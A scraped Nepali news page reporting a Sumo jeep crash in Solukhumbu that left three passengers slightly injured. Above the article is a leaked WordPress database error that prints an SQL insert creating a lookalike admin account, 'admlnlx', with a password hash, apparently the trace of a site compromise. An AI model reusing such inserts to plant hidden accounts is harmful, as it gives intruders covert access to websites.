WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6PnlQuH.np7XjlWAt5kM5V7csxruJ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 06:08:14', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुुखुम्बुबाट काठमाण्डौका लागी छुटेको सुमो दुर्घटना हँदा ३ जना घाइते भएका छन । सल्लेरीबाट काठमाण्डौका लागी छुटेको ना १ ज ४८०४ नम्बरको सुमो सोलु दुधकुण्ड नगरपालिका ११ तिङनासामा दुर्घटना भएको हो ।
दुर्घटनामा परि सवारीचालक सिन्धुपल्चोकको जुगल गाउँपालिका ५ का ५० वर्षीय रत्न सुनार, चितवन भरतपुरका ३१ वर्षीय सुमन गदाल र काठमाडौ महानगरपालिका १० का ३२ वर्षीय शेखर शर्मा सामान्य घाइते भएको जिल्ला ट्राफिक कार्यालय सोलुखुम्बुका इन्र्चाज कृष्ण कट्वालले जानकारी दिए । घाइते सबैलाई रमिते स्वास्थ्य चौकीमा सामान्य उपचार पश्चात काठमाडौ पठाएकोे छ । ९ जना सवार मध्ये ६ जना भने सकुशल रहेका छन । सुमो आफै अनियन्त्रित भएर सडकबाट करिब ५ मिटर तल पुगेको प्रहरीले जनाएको छ । सोलु एफएम डटकमबाट